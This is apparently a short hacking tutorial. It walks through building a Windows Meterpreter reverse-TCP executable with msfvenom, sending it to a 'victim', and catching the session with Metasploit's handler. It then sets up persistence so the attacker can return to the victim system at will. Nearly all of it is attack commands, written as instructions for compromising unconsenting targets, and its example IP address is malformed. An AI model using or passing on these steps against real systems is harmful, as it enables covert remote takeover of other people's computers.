Now create payload
Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber -f exe>filename.exe
- Run this command and wait for 2 mints.
- Now payload was created
- open your [ Metasploit-framework/bin/ ] Folder check your exe file
- Now send the exe file to victi
Now Open Metasploit Framework
- Open command prompt in this path [ Metasploit-framework/bin/ ]
- msfconsole (if not work give this command msfconsole.bat )
- Now Metasploit framework opened
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set LHOST yourip
- set LPORT portnumber
- exploit
- Now started reverse tcp handler : 4444
Now server waiting for victim interaction. Victim installed and opened the App meterpreter session 1 opened. (successfully hacked )
- Now Meterpreter session opened
- Type "help" command to know all commands
- sysinfo and more commands.
Persistence Attack
- run persistence -h
- now it can show how to use commands
- run persistence -U -i 20 -p portnumber -r yourip
- Eg : run persistence -U -i 20 -p 4444 -r 123.323.4.241
- hit enter to run the command
- now it can automatically inject the persistence payload into victim system
- Then any time you access the victim system